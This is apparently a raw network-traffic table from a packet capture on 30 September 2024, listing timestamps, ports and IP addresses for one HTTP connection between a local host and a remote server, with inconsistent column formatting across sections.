Sep 30, 2024 16:24:26.669411898 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260016918 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260081053 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260114908 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260129929 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260150909 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260164976 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260164976 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260188103 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260200024 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260221004 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260226011 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260256052 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260258913 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260288954 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260309935 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260323048 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260325909 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260359049 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.260375023 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.260400057 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.266427994 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.266489029 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.266566038 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.266633987 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.266740084 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.266788006 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.298069954 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.346396923 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.346431017 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.346462011 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.346482992 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.346497059 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.346517086 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.346527100 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.346554041 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.346558094 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.346590042 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.346592903 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.346626997 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.347289085 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.347340107 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.347341061 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.347372055 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.347382069 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.347409964 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.347439051 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.347486973 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:27.348144054 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:27.348176956 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348192930 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348212957 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348237991 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348268986 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348301888 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348316908 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349122047 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349153996 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349169970 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349189043 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349189043 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349225998 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349235058 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349263906 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349817038 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349849939 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349867105 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349880934 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349884033 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349917889 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349921942 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349967957 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.350616932 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.350668907 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351468086 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351519108 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351520061 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351558924 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.433937073 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.433971882 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.433994055 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434005022 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434022903 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434039116 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434042931 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434073925 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434077978 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434129953 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434139013 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434174061 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434185982 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434206009 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434215069 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434241056 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434248924 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434274912 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434284925 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434320927 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434458971 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434506893 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434509039 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434541941 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434551954 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434583902 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434591055 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434623957 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434650898 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434654951 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434662104 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434688091 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434700012 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434720993 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434731007 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434755087 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434762955 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434787989 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434794903 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434834957 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435163021 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435195923 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435219049 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435233116 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435244083 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435276985 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435281038 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435313940 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435323954 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435345888 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435353041 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435395002 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435431004 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435465097 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435477972 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435497046 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435507059 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435529947 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435535908 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435564041 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435573101 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435606956 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436044931 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436093092 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436094046 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436137915 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436162949 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436194897 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436207056 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436228037 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436235905 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436259985 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436268091 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436294079 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436302900 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436326027 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436336994 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436361074 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436367989 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528219938 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528243065 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528249025 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528285027 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529175043 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529222012 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529225111 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529256105 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529258966 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529289007 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529294968 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529326916 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529330969 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529371977 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554848909 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554898977 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554929972 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554961920 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554994106 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.557037115 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567725897 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567826033 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567877054 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567894936 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567894936 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567910910 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567924976 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567945004 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567953110 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567982912 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.568097115 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.568139076 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609436035 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609507084 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609513998 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609546900 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609559059 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609606028 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609610081 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609647036 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609657049 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609682083 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609688997 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609715939 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609719038 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609766006 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609766006 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609801054 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609808922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609846115 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609849930 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609883070 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609890938 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609931946 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609932899 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609966993 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609972954 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609999895 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610007048 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610034943 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610038996 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610084057 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610085964 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610121965 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610126972 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610147953 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610168934 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610174894 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610209942 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610230923 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610275984 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610300064 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610332966 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610340118 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610373974 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610383987 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610418081 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610450029 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610466957 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610490084 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610502958 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610527992 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610534906 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610541105 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610574007 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610589981 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610621929 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610630035 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610655069 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610665083 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610690117 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610690117 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610728025 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610759974 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610791922 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610822916 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610855103 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610860109 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610888958 CEST804917191.134.96.177192.168.2.22
Sep 30, 2024 16:24:27.610896111 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.610920906 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.610924959 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.610955000 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.610960960 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.610987902 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.610991955 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611022949 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611027002 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611057043 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611063004 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611089945 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611099005 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611121893 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611130953 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611154079 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611155033 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611186981 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611191988 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611218929 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611222982 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611254930 CEST  80     49171  91.134.96.177    192.168.2.22
Sep 30, 2024 16:24:27.611255884 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:27.611298084 CEST  49171  80     192.168.2.22     91.134.96.177
Sep 30, 2024 16:24:28.745800972 CEST  49171  80     192.168.2.22     91.134.96.177
